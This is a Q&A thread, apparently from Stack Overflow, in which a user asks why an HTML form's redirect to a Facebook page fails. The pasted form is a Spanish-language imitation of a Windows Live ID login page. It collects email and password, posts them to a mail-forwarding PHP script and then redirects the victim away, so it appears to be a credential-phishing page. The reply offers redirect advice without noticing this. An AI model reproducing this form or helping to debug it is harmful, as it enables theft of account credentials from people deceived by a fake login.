# HTML form redirect to Facebook page

Tags: html, facebook, forms, redirect

I hope this may be simple for someone. I have a simple html form with a redirect to an external Facebook page. Its there something special I need to do for Facebook? It does not redirect to the Facebook page. I tried a redirect to another one of my sites and it works fine.

I have gone through previous questions and seems they mostly concern custom apps and more technical things. I'm more on the design side so code usually baffles me. So please don't laugh.

I'm thanking your genius in advance.

Mark

I'm adding the source code for the form (it is confidential so I changed characters to "x" where needed): I might have butchered the code a little in placing it.

```
</td>
<td width="327" valign="top">
<p class="style15"><span class="style16"><span class="style23"><br /> iniciar sesi&oacute;n</span><br /> 
</span><span class="style18"><br /> <br /> </span></p>
<form action="/xxxxxxx.net/ProcessForm.php" method="post" name="Form" id="Form"> 
<input type="hidden" name="recipient" value="0,1" />
<input type="hidden" name="subject" value="Form Submission" />
<input name="redirect" type="hidden" id="redirect" value="http://www.facebook.com/people/xxxxxx%C3%ADa/xxxxxxxxxxxx">
<p class="style15"><span class="style25">Windows Live ID:<br /> <input name="textfield2" type="text" id="textfield2" value="xxxxxx_xxxxxx.com" size="50" />
</span></p>
<p><span class="style25">Contrase&ntilde;a:</span><span class="style18"><br /> </span>  <input name="passw" type="password" id="passw" size="50" />
<br /> <span class="style20"><a href="#">&iquest;No puede acceder a su cuenta?</a> </span></p>
<label> <input type="checkbox" name="checkbox" id="checkbox" /> </label> <span class="style18">Mantener la sesi&oacute;n iniciada</span>
<p><input type="submit" name="submit" value="Iniciar_sesi&oacute;n" /></p>
```

Comment: You should give us some code, so we will see your problem!

Answer (score 0):

Yes if you are redirecting to any facebook app then in that case, first create an app on facebook

Follow these steps to create and app 
[I am new How do I make my app live on FB](https://stackoverflow.com/questions/20696738/i-am-new-how-do-i-make-my-app-live-on-fb/20699204#20699204)

After that create a facebook page and use that app inside that . Various mode are available of what type of content user will see.
1. If u want to host an external code then use htmlapp or some image app .

Then after you are done with this you will get a unique url of your page.
Just on link of that form use that above unique url .

Now you are ready to rock and roll

Comment: Thanks for your answer. I'm not sure I understand. you say "redirecting  to any Facebook app" but I am just trying to go to a Facebook page. Is that considered an "app"?

Comment: Let me moreclarify that .  If u want to redirect to any url something like this "https://www.facebook.com/Codinghub.solution"  then simple use it as a redirect but if u want to redirect to facebook page and that too created by you in that case create your app and link it...